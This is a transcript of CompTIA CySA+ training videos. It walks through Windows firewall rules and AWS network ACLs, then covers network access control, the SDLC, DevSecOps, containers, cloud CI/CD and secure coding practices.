So the more software you install, the more extra little firewall rules you might expect to see. So to build a
firewall rule in Inbound Rules, I'm going to right-click on Inbound and choose New Rule.
[Video description begins] A wizard window called "New Inbound Rule Wizard" opens. A page called "Rule
Type" is open. It is divided into two parts. The first part is a navigation pane and the second part is a content
pane. [Video description ends]
Now I can base this rule on a Program. So, if that Program needs certain types of network connectivity, this
rule can either allow it or deny it. It can be based on a Port number, that's an OSI model layer 4 or transport
layer port number, such as for port 80 for an HTTP web site, or port 25 for SMTP, that type of thing, or
Predefined. The current stuff is going to be here. So, if you want to allow connectivity for DNS, DNS Service
is there. In my case, I want to allow connectivity for Remote Desktop.
[Video description begins] He clicks a drop-down list box called "Predefined" and selects an option called
"Remote Desktop". [Video description ends]
Now, I could have chosen Port and specified port 3389, which is what remote desktop protocol uses. But since
it's predefined, I might as well choose it from there.
[Video description begins] He clicks a button called "Next". A page called "Predefined Rules" opens. [Video
description ends]
And I'm going to select all of the rules for TCP and UDP, I'll click Next.
[Video description begins] A page called "Action" opens. [Video description ends]
And at this point in this firewall rule, I have to decide. Do I want to allow the connection or block it or only
allow if secure. That's where IPsec or IP security comes in. IPsec allows you to have a secured connection at
any level in the TCP IP network environment. So you don't have to have a PKI certificate to, for example,
encrypt the connection like you would with an HTTPS web server. Here I'm going to click Allow the
connection and Finish.
[Video description begins] He clicks a button called "Finish". The wizard window closes. [Video description
ends]
And at the top of the list we can see the remote desktop rules that resulted from me selecting from the
predefined rule list.
[Video description begins] He points to the rules in the Inbound Rules pane. [Video description ends]
Now at any point in time, I can double-click and open up a rule. And the interface looks a little bit different,
and make a few changes.
[Video description begins] He double-clicks a rule labeled “Remote Desktop – User Mode (TCP - In)” under
the Name column header. A dialog box called "Remote Desktop -User Mode (TCP-In) Properties" opens. It
includes tabs labeled “Protocols and Ports”, “Scope”, “Advanced”, “Local Principals”, “Remote Users”,
“General”, “Programs and Services”, and “Remote Computers”. The General tab is open. [Video description
ends]
Now, if it's a predefined rule, it says here some of its properties cannot be modified, which is correct. So for
example, whether or not we have this rule enabled, or whether we're allowing or allowing if it's secure,
blocking. And I can even specify remote computers or remote users that would have to be logged in using
certain computers before the rule would be applicable.
[Video description begins] He selects the Remote Computers tab. [Video description ends]
But, if you do that so, if I say only allow connections from certain computers, it says, well, you can only do
that if you set the authentication to allow only secure connections. That was back on General down here. So
allow the connection only if it's secure. We can also specify under Scope IP addresses that are applicable. So
where this, maybe you want to limit where this rule will allow remote desktop traffic destined to. We have a
number of other items we can specify such as under Advanced, we can say I only want this applicable on the
domain network. In other words, I don't want to allow inbound RDP when this machine is connected to any
other type of network.
[Video description begins] He clicks the Advanced tab. It includes a section called “Profiles” with checkboxes
labeled “Domain”, “Private”, and “Public”. He unchecks the Private and Public checkboxes. [Video
description ends]
Now, if this is a server, the chances of actually taking the server to another location are probably very slim,
especially if it's a virtual machine. So these options are really more applicable for Windows desktops or
laptops.
[Video description begins] He clicks a button called "Cancel" and the dialog box closes. [Video description
ends]
At any rate, once we've got this configured properly, we can then even take all of those rules and the
configurations and export the list so with that we could use it on other hosts.
[Video description begins] He right-clicks the Inbound Rules option and points to an option called "Export
List". [Video description ends]
You can also configure this centrally in Group Policy for domain joined computers that have similar firewall
rule needs.
During this video, you will learn how to configure an Amazon Web Services security group.
Objectives
[Video description begins] Topic title: Cloud Firewall Solutions. The presenter is Dan Lachance. [Video
description ends]
In the Amazon Web Services cloud environment instead of configuring firewall settings at the individual
virtual machine OS level, which you can still do.
[Video description begins] A web page called "AWS Management Console" opens. [Video description ends]
But alternatively, you can use cloud-based firewall solutions like security groups to protect traffic flow for
individual virtual machines or network ACLs to control traffic flow for subnets in the cloud. Let's start here in
the AWS Management Console by going into the VPC Management Console where we do all things
networking. And I'm going to scroll down here. First of all, let's take a look at Your VPCs.
[Video description begins] He clicks an option called "Your VPCs" in the navigation pane and the
corresponding page opens. [Video description ends]
And I've got a VPC here called VPC1. And, if I click on Subnets, we've got a number of subnets available.
[Video description begins] He clicks an option called "Subnets" in the navigation pane and the corresponding
page opens. [Video description ends]
So subnet 1, 2, and 3 within VPC1. You can associate a network ACL or access control list, essentially firewall
rulesets to specific subnets. So I'm going to scroll down to Network ACLs where I'll see any existing ones.
[Video description begins] He clicks an option called "Network ACLs" in the navigation pane and the
corresponding page opens. It includes a table with five columns and one row. The column headers are
"Name", "Network ACL ID", "Associated with", "Default", and "VPC". [Video description ends]
[Video description begins] He clicks a button called "Create network ACL" and a page called "Create network
ACL" opens. [Video description ends]
[Video description begins] He enters the text AllowRemoteMgmt in a text box called "Name tag". [Video
description ends]
And I'm going to tie it to a particular VPC. In this case, VPC1, and I'm going to choose Create.
[Video description begins] He clicks a drop-down list box called VPC and selects an option called "vpc-
74a7a10d". [Video description ends]
So it shows up here AllowRemoteMgmt, but notice what we've not yet done is specified the actual firewall
rules themselves.
[Video description begins] He clicks a button called "Create" and the Create network ACL page
closes. [Video description ends]
So having that network ACL selected down below, I can view both the inbound rules, which allow everything
from anywhere.
[Video description begins] He selects AllowRemoteMgmt under the Name column header. In a section below
the table tabs labeled "Details", "Inbound Rules", "Outbound Rules", "Subnet associations", and "Tags" are
displayed. [Video description ends]
Having the newly created network ACL selected down below, I can click Inbound Rules, which denies all
traffic by default. And for Outbound Rules, it's denied as well. But we can edit these.
[Video description begins] He clicks the Inbound Rules tab and clicks a button called "Edit inbound rules". A
page called Edit inbound rules opens. [Video description ends]
So I can go to Inbound Rules and click Edit inbound rules and add a rule.
[Video description begins] He clicks a button called "Add Rule". [Video description ends]
For example, I'm going to add a rule number here, Rule 100. And I want to allow, in this case, SSH, remote
administration traffic, so it fills in the protocol number and the port number.
[Video description begins] He clicks a drop-down list box called "Type" and selects an option called "SSH
(22)". [Video description ends]
I can specify a source from where I want to allow this connection. 0.0.0.0/0 means from anywhere. Ideally,
you'll pop in an IP address there for a specific location from which you want to do your remote SSH
administration such as the public IP interface for a network that you administer from. Now with the network
ACL, we can either allow or deny the traffic. I'm going to allow that traffic, and I'm going to add another one.
[Video description begins] He clicks the Add Rule button. [Video description ends]
Rule 101, so Rule 101 executes or gets checked only after Rule 100 is checked and doesn't have a match. In
this case, I want to allow Remote Desktop Protocol or RDP for a Windows Remote Management.
[Video description begins] He clicks the Type drop-down list box and selects an option called "RDP
(3389)". [Video description ends]
So again, it specified the protocol number of 6 for TCP. It's got the port number 3389. And again, this is going
to be an allow rule from anywhere. So I'm just going to go ahead and save that.
[Video description begins] He clicks a button called "Save". [Video description ends]
Notice now, if we don't have a match with those two rules, because they're parsed by the rule number from top-
down, then the deny rule, the default deny rule, the bottom kicks in.
[Video description begins] He clicks the Inbound Rules tab and clicks a button called "Edit outbound rules". A
page called Edit outbound rules opens. [Video description ends]
[Video description begins] He clicks the Add Rule button. He enter 100 under the Rule # column
header. [Video description ends]
So, if I edit the outbound rules, we might want to add a rule number here to allow outbound traffic of a specific
type.
[Video description begins] He clicks the Type drop-down list box and selects an option called "All
Traffic". [Video description ends]
We could specify all traffic, so I could scroll through the list here and choose ALL Traffic, and we could allow
it, so I'm going to do that in an outbound direction.
[Video description begins] He clicks a button called "Save". [Video description ends]
Now the next thing we would do, we are still having the network ACL selected. It's associated with one or
more subnets under the Subnet associations tab. From here we can click the Edit subnet associations button
and select a particular subnet of interest.
[Video description begins] A page called "Edit subnet association" opens. [Video description ends]
So let's say, I'm interested in using this for a particular subnet that I will select from the list.
[Video description begins] He clicks a button called "Edit" and the Edit subnet association page
closes. [Video description ends]
That means these inbound rules and outbound rules are applicable to the selected subnet. And, of course, by
extension, any virtual machine instances. So in AWS parlance, EC2 instances that happened to be deployed in
that subnet.
Upon completion of this video, you will be able to describe the role NAC plays in securing a network
environment.
Objectives
[Video description begins] Topic title: Network Access Control. The presenter is Dan Lachance. [Video
description ends]
Network Access Control, as the name implies, is about limiting which devices can access the network.
[Video description begins] Remote Authentication Dial-In User Service (RADIUS). [Video description ends]
Network Access Control, as the name implies, is about limiting which devices can access the network. And
that can be based on a number of criteria. Part of that is using Remote Authentication Dial-In User Service or
RADIUS. So RADIUS servers are authentication servers. So when users connect to a network or they attempt
to connect to a network, we can first require that authentication succeed whether it's at the user and/or the
device level. So maybe the device has to authenticate because it's got a valid PKI certificate that's trusted, and
the user has supplied credentials that are also trusted and successful.
Now authorization would be the authorization to use resources on the network. So to access the network. So
the RADIUS server then here could also be called an Identity Provider or an Idp. So take note what's
happening here is we aren't leaving the authentication up to the edge network device like a router, a VPN
appliance, a switch, a Wi-Fi router. Instead, those edge point devices forward the authentication requests
elsewhere to a RADIUS authentication server on a protected network.
Aside from using device and user authentication to determine if network access is allowed, your
implementation of network access control might also take a look at the state of the machine. Does it have all
OSN software updates applied? Is there an anti-malware solution installed and does it have updates applied?
Otherwise you could prevent network access or allow them to access a network where they could update the
system.
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined the security of network infrastructures for both on-premises and cloud-based
network configurations. We did this by exploring the management of on-premises and cloud-based networks.
We talked about network segmentation and VPN solutions. As well as how to link an on-premises network to
the AWS cloud through a site-to-site VPN. We talked about factors to consider when designing a cloud
network strategy. And also we talked about the change management process and underlying supporting IT
services and the benefits of VDI.
We talked about how to configure and connect to a cloud VDI. Talked about different types of firewalls for
protecting digital assets. And how to configure a Windows firewall and AWS network ACL. And finally, we
talked about Network Access Control, RADIUS and TACACS+. In our next course, we'll move on to explore
security related to software development throughout the development life cycle, including vulnerability testing,
and secure coding practices.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance. He is an
IT Trainer and Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have
included networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting
across a wide array of Microsoft products. The (CS0-002) CompTIA Cybersecurity Analyst or CySA+
Certification Exam is designed for IT professionals looking to gain security analyst skills to perform data
analysis, to identify vulnerabilities, threats, and risks to an organization, to configure and use threat detection
tools, and secure and protect an organization's applications and systems.
In this course, we're going to explore software development security from design to deployment and
maintenance, including talking about software vulnerability testing and secure coding practices. I'll start by
examining the Software Development Life Cycle or SDLC, and related methodologies such as the capability
maturity model or CMM, and the importance of addressing security during the entire IT life cycle. I'll then
explore microservices, decoupling, the benefits of application containerization in common Platform as a
Service software developer service offerings, as well as talking about secure coding practices. Next, I'll explore
the benefits of software testing including unit and regression tests. Lastly, I'll examine the use of reverse
engineering by malicious users to detect programming flaws and to demonstrate how to reverse engineer an
Android application using the Apktool.
In this video, you will identify the phases of the SDLC, including related methodologies such as the capability
maturity model.
Objectives
identify the phases of the SDLC, including related methodologies such as capability maturity model
[Video description begins] Topic title: Software Development Life Cycle. The presenter is Dan
Lachance. [Video description ends]
The Software Development Life Cycle or SDLC is a structured approach used by software developers to plan,
create, and deploy a software solution. It begins with system design specifications. What are the functional
requirements for the solution? What should it do? And how should it do it? Is there any specific details related
to how authentication or encryption or data loss prevention should be put in place?
[Video description begins] Software Development Life Cycle (SDLC). [Video description ends]
Next is development and implementation. Now the development and implementation can be done on-premises,
so developers can use tools they're familiar with already, or they might use cloud-based developer solutions.
Often in the cloud, the underlying work setting up the infrastructure, the servers, the storage is taken care of.
So, developers can often generate code much more quickly because they can focus on the code itself and not
the underlying supporting infrastructure. The documentation should be generated as code is built and tested.
And, of course, as code modifications are made over time, this documentation can be used for training or for
onboarding of new employees for those that will be affected by this particular solution. Then there's the
evaluation such as the peer code review where other developers can look over code to ensure it looks like it's
done in accordance with secured coding practices. And then, of course, there's testing. Testing can be manual,
whether it's fuzz testing, the solution, or unit testing, or regression testing, or load testing. That can also be
automated. Finally after successful testing, the solution can transition to a production environment that can
include the packaging of the solution for different platforms, and the delivering of the solution to devices, such
as by posting the package on a web site for download, or even using push notifications to notify users of an
app that there is an update.
[Video description begins] Code Modifications and Automated Deployment. [Video description ends]
Software developers will often use a centralized tool again whether on-premises or in the cloud, they'll work
together on different chunks of code at different points in time. So, it would start with a developer, realizing
that a change needs to be made and then checking out that code module. Now when they check it out, they're
the only ones that have right access to it. So, the code is then modified in accordance with secure coding
practices. When the code is completed, then the code is checked in, after which that might trigger automated
testing, packaging, and deployment of the solution. Now, the thing about this, this whole thing is called the
code build process.
And from a security perspective, as a cybersecurity analyst, we need to be aware that at any point in this code
build process, if there are vulnerabilities, such as when the code is being modified, then a malicious user might
be able to inject some malicious code at that point before the code is checked in and then tested, and depending
on the type of code that was injected can determine whether it gets picked up by testing or peer review. The
Capability Maturity Model or CMM is a framework that's designed to continuously improve some kind of an
IT solution.
[Video description begins] Capability Maturity Model (CMM). [Video description ends]
So, on the cyber security side, it means that with CMM, we can plan for security practices. That might be, for
example, a specific way and sequence of events, standard operating procedures for developers to check out
code, make changes, check it in, and then run tests against it. So, it needs to be a standard set of consistent
practices that are used repetitively. So, the CMM then allows us to set expectations for the cybersecurity
programs, such as ensuring that secure coding practices are adhered to and standard operating procedures are
followed. So, we can define specific criteria for exactly how that should be done.
[Video description begins] The CMM defines criteria for standardized security practices. [Video description
ends]
So, there could be user onboarding for new developers that get hired, for example, on how the organization
expects the development process to work in accordance with the SDLC.
[Video description begins] Service Oriented Architecture (SOA). [Video description ends]
This can either be a hardware or a software appliance. Its purpose is essentially to serve kind of as a service
registry. So, what it will do is it will allow service providers to register APIs that are then advertised to clients
that might consume them. XML gateways can also serve as TLS termination points. So, if you're securing an
application using HTTPS, then what happens is that the termination for that the decryption can happen at the
XML gateway, thus offloading that computationally expensive task from a web server. There are other
standards as well, such as Web Services or WS-Security. This uses security mechanisms to protect SOAP
messages. SOAP is used by developers to send small transmissions over a network, so for sending and
receiving messages between software components. Web Services-Trust uses security tokens.
A security token is the result of successful authentication through a trusted central identity provider. And that
token is what gets handed off to allow access or to allow authorization to use other services or apps. WS-
SecurityPolicy is a framework that uses policy security settings that dictate how services will be accessed and
who is allowed to access them.
Upon completion of this video, you will be able to recognize how security must be addressed during the entire
IT life cycle.
Objectives
recognize how security must be addressed during the entire IT life cycle
[Video description begins] Topic title: DevSecOps. The presenter is Dan Lachance. [Video description ends]
SecDevOps stands for Security, Development, and Operations. It stems from DevOps. DevOps is a
combination of software development and software operation and software maintenance.
[Video description begins] Security, Development, and Operations (SecDevOps). [Video description ends]
So, it include things like the creation of application programming interfaces or APIs, or it could include the
consumption of them, whether using messaging protocols to do that, such as SOAP or REST. And this also
deals with continuous integration and delivery or CI and CD of a solution, where code changes are made, and
automation is used to test solutions and deploy the package as quickly as possible.
But this has to be done with security in mind at all stages of the Software Development Life Cycle or SDLC.
So, security needs to be integrated into the development and the deployment process. So, this means any code
changes that are made need to be tested to ensure that secure coding practices are being adhered to and that
flaws aren't being introduced. Now that can be done through a peer review and/or through automated solutions.
Security needs to be integrated whenever this happens. It can't be something that is triggered manually when
developers are working on code.
The incident response plan, or the IRP, needs to be put in place, so that if there is some kind of a security
breach, when it comes to either the development of the software solution or the deployment of it, that there are
parties that know what their responsibilities are and which actions should be taken. So, automation is key when
it comes to SecDevOps. We want to use automation because it allows for repeated consistent practices. It also
reduces the element of human error. So, that would include things like automated testing when code is checked
in, automated software packaging deployment, even automated encryption of stored software solutions.
In this video, you will learn how software developers create modular, independent, and reusable code.
Objectives
identify how software developers create modular, independent, and reusable code
[Video description begins] Topic title: Microservices and Decoupling. The presenter is Dan Lachance. [Video
description ends]
Microservices have become a fundamental aspect of software development. The idea is to have modular
software components that together comprise an application. So, as opposed to writing a single big, large
application, we can have different microservices that handle certain functionality of the app.
So, what we're really talking about then is creating multiple different functions or application programming
interfaces, or APIs which are a collection of related functions, or even using application containers to run
specific software components. So, with microservices, each software component or module or microservice
whichever term you prefer, each one of them can communicate with other microservices. Now, this allows for
loose coupling. What that means is that if we are using, for example, message queues to store messages, send
and receive between software components, component A might drop a message in the queue to be read at any
time when component B is available. So, microservices can also facilitate code modification and testing. Now,
how is this? Well, it's possible because a developer might check out just a small section of code.
In other words, a microservice where changes are required. Now you can check out that chunk of code using a
specific code repository and code building tool. Now while that code is checked out, nobody else can modify
it. So, it's modular in that sense. It's also modular in the sense that a microservice can be tested independently
of other microservices. The other thing to think about is code reusability. If we've developed, let's say, a
microservice that handles printing from the web. Well, that could be used over and over and over in many
different applications that need that kind of functionality. And so, because it's not built into an entire single
large monolithic application, but instead it's its own component, very easy to reuse.
[Video description begins] Decoupling. [Video description ends]
Now we talked about decoupling, where we might have app component 1 seen here on the left, that writes a
message into a message queue. Now message queue is a small storage location on disk somewhere. In the
cloud, such as with Amazon Web Services or AWS, there is the simple queue service or SQS offering, which
is designed for message queuing. So, once app component 1 drops a message into the queue, and that message
needs to be read by app component 2. Whenever app component 2 is available, it can go read the message, and
then process whatever needs to be done. Now this is as opposed to requiring both app component 1 and 2 to be
online at the same time reachable at the same time over the network. So, in this case, we're supporting
decoupling through the use of a centralized message queuing system.
After completing this video, you will be able to recall the benefits of using containerized applications.
Objectives
[Video description begins] Topic title: Application Containerization. The presenter is Dan Lachance . [Video
description ends]
Application containerization has become more and more prevalent, especially for software developers.
Pictured in our diagram, we can see a number of application containers across the top, labeled as App A
through to App G. Now, an application container can contain all of the entire application software, or maybe
it's just a modular piece of code running in the container, such as a specific printing function. So, it's a
microservice that runs in a container that could be used over and over with multiple apps. So, that's another
possible way to work with application containerization. Now, the binary files and libraries called upon by
components within the container, all of that can be stored within the container, or it might be stored outside of
it in the underlying host OS.
Ideally, you will try to self-contain as much software as possible within the application container. Now, the
application container needs to have a specific containerization engine that manages them. And the most
common example is probably Docker. And that's why we see the Docker Engine listed here. Now, that would
be installed in a Windows or a Linux environment. So, you still need the underlying host operating system, or
OS. A container image is essentially a blueprint. It contains the software and settings for running whatever that
software component is within the container. Images can also contain metadata that describe the image. And
that might be useful if, for example, the image has a preconfigured MySQL database. Well, we might want that
to be somehow reflected in the metadata. So you could say, then, that a container is just a runtime instance of
an image. And that's true, it is. Now, the container will contain the software in question. It'll contain settings
related to that software and usually app-specific libraries. And anything else about the runtime environment,
such as environment variable configurations required for that software component to run. Now, the container
might also have tools that are used to tweak, manage, or somehow optimize the component running within that
container.
Containers have a lot of benefits. There's a reason they're being used on a large scale these days, both on-
premises and in the cloud. The first benefit is quick container startup time. Now, this is true because the
operating system is already running. Remember, an app container does not contain an operating system like a
virtual machine does. You don't have to wait for the OS to spin up because it's already been spun up. It's
already there and running. The container simply runs as a process running within the host OS. Also, make sure
that you store application-specific elements within the container as much as possible. Because the benefit of
doing this is that the app is self-contained. So, it can be tested and scaled and managed separately from other
app containers. But the other benefit of having everything stored within the container is portability. You can
move it around to different containerization hosts.
On the security side, because containers have generally a shorter lifespan than a normal application simply
installed and running on an OS, it means that there's less of a chance of advanced persistent threats being
installed over a long period of time. Remember, an APT, or advanced persistent threat, means that a
component or a device or a host was compromised, and essentially the attackers remain in there undetected for
a period of time. So, due to the shorter container lifespan, that's probably not going to happen as often. For an
example, you might have an application container that has a specialized printing function for an app. And it's
only up and running when it's needed by another software component. It doesn't always have to be up and
running. The other thing is that containers are processes running within the OS. And depending on your
containerization engine, like Docker, you can determine what privileges containers will run with. So, the idea
is to make sure they don't run with full privileged capabilities, such as the administrator Windows account or
the Linux root account.
The other thing that we want to make sure of is that sensitive data is not stored in containers, where possible.
And when you are starting to work with a container, you might use an existing container image that has pretty
much what you need already done. And while that might be tempting, make sure you only use containers that
are from trusted third parties. And they should be digitally signed.
Upon completion of this video, you will be able to list common software developer service offerings for PaaS.
Objectives
[Video description begins] Topic title: Cloud Developer Services. The presenter is Dan Lachance. [Video
description ends]
There are plenty of cloud based developer service offerings and it makes overall development quicker because
the underlying architecture is already set up by the cloud service provider. So, we can talk about then some
benefits of cloud-based CI/CD solutions.
The CI/CD means continuous integration and continuous deployment. And what that generally refers to is in a
software development context, very quickly integrating changes into code and very quickly testing it, applying
security, all phases of the software development lifecycle. And then, of course, quickly packaging and
deploying the solution making it available. It's all about doing things quickly and efficiently and effectively
and securely. So, this applies to coding and testing using cloud-based code repositories.
A code repository is a centralized storage location for code. And if, you're working with modular code, if
you're working with microservices where you've got specialised chunks of code that have their own
functionality, it allows developers to work on each of those chunks of code or microservices separately from
others. So, it makes it very efficient not only from the modification level but also from the testing, the scaling,
and security aspect, because it can be done on a per microservice level. Code builds are often facilitated by the
use of a centralized multideveloper team tool. Now using a tool like this allows developers to check out a
chunk of code or a microservice, which means nobody else can modify it while they have that code checked
out. And then, of course, after the code is checked back in, it could be tested and then that might even trigger
an automatic code build. In other words, recompiling the software and then packaging it up, in preparation for
code deployment. Code deployment could be as simple as posting a new version of software on a website for
people to download. Or in some cases, it might automatically use some kind of push notification mechanism to
push out the updates, or at least push out the notifications of updates to people using the app.
Coding and testing starts with the actual coding. Secure coding practices need to be adhered to by developers.
Because even though we might apply security controls after the fact, if secure coding guidelines aren't adhered
to, it's still not going to be as effective with the security controls as if secured coding guidelines had been
adhered to, so very important. Next, code builds, as we've discussed, can occur. Then testing, ideally that will
be automated, then having a staging area to package up the solution and then deploying it to a production
environment. So, automating as much of this as possible, not only makes the process much more efficient, but
it can also make it more secure. In other words, less susceptible to human error.
Cloud code repositories are central locations to store code. And so we could have code storage and versioning,
where we track all the updates that are made to different chunks of code. This would allow for centralized
collaborative coding, as well as review. So, developers can still use familiar tools if you're using a cloud-based
repository. So, whether you're dealing with a public cloud provider like Microsoft Azure, or Amazon Web
Services, to name just a few, they all support creating your own private code repositories that are compatible
with GitHub.
[Video description begins] Cloud Code Repositories allow private repository hosting. [Video description ends]
So, if you're already familiar with how to use GitHub based tools, you're still going to be in a familiar
environment. You can also scale the storage for storing code and code modifications in the cloud. That's one of
the great things about the cloud is the rapid elasticity with which cloud infrastructure can be deployed. We then
have to think about encrypting data in transit. So, if a developer is working on a laptop on-premises and pulling
up a code, maybe checking out the code from a library to make changes to it. And that's happening over the
Internet, we want to make sure that connection is encrypted. So, either HTTPS is being used or the connection
is being made through a VPN tunnel. Of course, encrypting data at rest, server-side wherever the code is being
stored is also important. You can also set IAM permissions to specific repositories. Now this is especially true
in cloud environments, where we can create roles, or collections of related permissions, that we assign to users
or groups to give those specific permissions, such as any related to working with code in a cloud-based
repository.
[Video description begins] Code Building and Packaging. [Video description ends]
With code building and packaging, we're talking about the compiling of code after a code, a piece of code
that's been checked out for modification gets checked back in and committed or written to the store. So, then
we can have automated testing and there are many different types of tests, and then ultimately the automatic
creation of software packages.
We talked about code deployment. Now, the idea is that having smaller updates on a continuous basis, or
always looking for improvement, means smaller amounts of code that have to be changed and deployed. And
since a failure in this example might only apply to a recently deployed feature, it allows developers to find the
problem more quickly, than if there's only a security update once a year for the entire application, as opposed
to individual components. This also allows for a shortened time to market. This allows us having a competitive
edge when it comes to making changes to software and making them available as quickly as possible. The
deployment could be to on-premises or cloud locations, such as instances, VM machines, in other words,
virtual machines. And also, rollback can be configured to be automatic when the deployment of a solution
fails.
After completing this video, you will be able to recognize common secure coding practices.
Objectives
[Video description begins] Topic title: Secure Coding. The presenter is Dan Lachance. [Video description
ends]
It's important that cybersecurity analysts have a degree of knowledge for one or more programming
languages.
Now the client side has a number of different components that developers might create depending on the type
of solution being built, such as writing JavaScript that might be embedded within HTML code or, of course,
writing HTML to describe the formatting of web pages to control their appearance. And also perhaps even the
use of precompiled web browser plug-ins to give additional functionality to the app, such as the ability to view
PDFs or the ability to play embedded videos without requiring a third-party app installed on the machine
outside of the browser.
The multi-tiered web applications will also use code at some level. Question is exactly where all code
components exist. In this example, we've got a web server at the top in the DMZ, the demilitarized zone. So,
that would be the front-end web interface, for example, for a web application that a user would interact with.
So, there might be HTML-based forms. There might be some JavaScript. It could be a lot of things built into
that. So, you will have some code components that get downloaded to the client web browser from the web
server. Now that would be out on the Internet. Now the other thing to notice in this diagram is that we've got
an internal network. And this might be where you choose to host database servers used by the front-end web
server in the DMZ. It's also where you would find things like authentication servers. We don't want apps
themselves to perform authentication. We want them to refer authentication to a centralized and trusted
identity provider.
In our diagram, that's listed at the bottom center as an authentication server. And so, there could be code
components then that also reside on other servers, such as on the internal network. An example of this might be
having some stored procedures that get triggered when certain events occur within the database. So, the idea is
think about where the code modules might reside. Another item that we don't see listed here in the diagram is
the use of some custom code being stored in a cloud computing environment.
Secure coding, as the phrase implies, is a way to write code at the software development level while adhering
to security principles. And so, the specific details will vary from one programming language to another, but a
lot of the concepts are the same. The general concepts mean ensuring confidentiality where possible, integrity,
and availability. The confidentiality would be things like encryption. Integrity would be ensuring that we
validate user-supplied input to an app. You need to treat user supplied input to an app as being suspicious, and
essentially to be malicious until otherwise proven. Availability means ensuring that we've got a solution
available in more than one location, for example, through clustering, or through replicating data to alternate
sites. So, this could involve using TLS, Transport Layer Security, for encryption or confidentiality, digital
signatures to ensure that transmissions over the network are authentic, password complexity, and as we've
mentioned, app clustering.
[Video description begins] Secure Coding - SDLC Phases. [Video description ends]
[Video description begins] An image is displayed. It contains several blocks labeled "Define requirements",
"Plan and design", "Coding", "Test", "Deploy", and "Operate and maintain". The Define requirements block
is connected to the Plan and design block. The Plan and design block is connected to the Coding block. The
Coding block is connected to the Test block. The Test block is connected to the Deploy block. The Deploy
block is connected to the Operate and maintain block. The Operate and maintain block is connected to the
Define requirements block. [Video description ends]
It's important that security be applied to all phases of the SDLC. All too commonly, and you might have
experienced this yourself. There just won't be enough time to properly think about security as it applies to the
building of a software or IT-related solution. And also it's about money. And that usually is related to time. If
we're going to allocate time, it means we're allocating costs or resources to securing the solution. So, we're
focusing here on secure coding, actually writing the code as part of the SDLC. But it's important to remember
security needs to be applied to all levels of the SDLC.
So, secure coding means treating user-supplied data as untrusted. It's not to be trusted. So, we need to have
proper input validation routines to ensure that what the user is entering in is what we intended to have entered
in, such as in a form field in an HTML web page environment. We can sanitize user input, maybe stripping out
special characters that might have meaning in the underlying database or operating system. And it might also
mean the use of hidden fields to perform background checks on what the user is typing in or supplying. The
user can't see it. Now, at the same time, when we're talking about what the user can see, in the user interface,
we want to make sure that we don't depend on only user interface security controls to protect things. In other
words, you don't want to depend on a user clicking on a specific button before sending something to a server.
Because these can be bypassed easily, malicious users can download the underlying code that is running client
side for that app. And they might notice that a security check is only triggered when a user clicks a button. And
so, they might modify a URL to bypass the clicking of that button, thus, bypassing security checks. So,
malicious URLs then might be constructed to do just that.
Now we also have to think about error messages that might be returned when error condition is encountered.
We don't want to reveal too much sensitive information on an erroneous customized web page, such as the
version of the database engine being used. We might want to work with session timeouts to make sure that the
session timeout makes sense for the way the app will be used. If you have very, very long session timeouts,
then it might be easier for a malicious user to send a denial-of-service attack to a web server. For example, by
sending a bunch of half-open sessions, if you have a very long session timeout, it won't take long for server
resources are exhausted.
We need to think about the data type and the length, the amount of data that will be supplied by a user to an
app, whether it's through an HTML web form, or through a URL parameter. We want to make sure that we
only allow for what we expect. So, if we expect a three-digit code, that's all that should be allocated to
memory. And depending on the computer language you're writing code in, will determine which functions you
might use to parse and process that information. Some are more secure than others. It's also important that
validation of user input be done server side, not client side. Now, some people don't like this because it means
until they submit, let's say a form that they filled out to the web app, they don't know that there are errors,
maybe they didn't input a ZIP code or a postal code. They won't know that until they submit it to the server.
Some people want that to happen as you go from field to field on a web form, which is great functionally. But
the problem is we're relying on validation in client-side code that we lose control of once it's downloaded to
the client. And that's why validation really needs to occur server side.
We then have to think about encoding. So, for example, we might encode data to a specific standardized
character set before validating the input. So, we might want to make sure that, for example, by doing this with
our input validation, that we are checking for certain types of characters that might get by our normal
validation rules, like null bytes, or newline characters or slashes and dots. Other things to think about at the
software development level is the generation of unique session identifiers. Every time a user has a new session
with the server, we don't want those hanging around for too long because they could be hijacked and used by a
malicious user. Keep session identifier information hidden. We shouldn't allow multiple concurrent user
account logins with the same account. And we can even do some HTML and HTTP stuff to secure an app or to
help secure it, such as configuring the secure cookie attribute.
Basically, a cookie is a text file used by your web browser to store session information or user preferences. But
using a secure cookie means it can only be used in certain specific ways within specific sessions. And we
should always adhere to the principle of least privilege for app pages. What this means is unless someone
absolutely requires access to specific web pages when using an app, unless they absolutely need that privilege,
they shouldn't have it. We should always have a continuous monitoring solution in place for our apps. So, to
audit app access over time. Perhaps looking for irregularities, such as people logging into an app in the middle
of the night when that normally doesn't happen.
The other thing to think about is key management if you're using cryptographic keys, such as with PKI
certificates. An entire PKI or public key infrastructure is rendered useless if private keys are compromised,
especially private keys higher up in the PKI hierarchy. We should be encrypting data at rest using at least AES
256-bit encryption, centralized app logging. So that, if a web server, for example gets compromised, and it's
the only place where web app logs exist, that's a problem because they are under the control of the malicious
user. So, they could feed in false data to the log or clear it. So, we need that stored elsewhere. Where possible,
software developers should use existing code libraries and components that are trusted and digitally signed,
instead of trying to reinvent the wheel. Not only will this help with security but it also ends up meaning that
whatever the software solution is that the development team is working on will be completed quicker.
The other thing to watch out for is cleaning up after yourself if you're a software developer. So, normally when
you're writing code and testing, you'll add little hints and notes, especially during a peer review where others
are reading your code. We want to make sure that those are removed. One of the reasons is because there's a
possibility that a malicious user could reverse engineer or decompile something that you've written. And then
see all of these comments, which could reveal a lot of details that should not really be known. And finally, the
last thing to think about is to always apply updates to any centralized code libraries that might be used by
software developers. And also applying updates to third-party components that are being used by an app.
After completing this video, you will be able to recall how software testing can result in more secure software
solutions.
Objectives
recall how thorough software testing can result in more secure software solutions
[Video description begins] Topic title: Software Testing. The presenter is Dan Lachance. [Video description
ends]
There are many different ways to test IT solutions for security weaknesses. One way is to use a sandbox
isolated environment. This means, for example, if you want to test the security of a specific type of
configuration on the network, perhaps between updates being deployed to Windows 10 stations. You might set
that up in a virtualized sandbox environment to test any potential security implications. It also means
conducting periodic vulnerability testing.
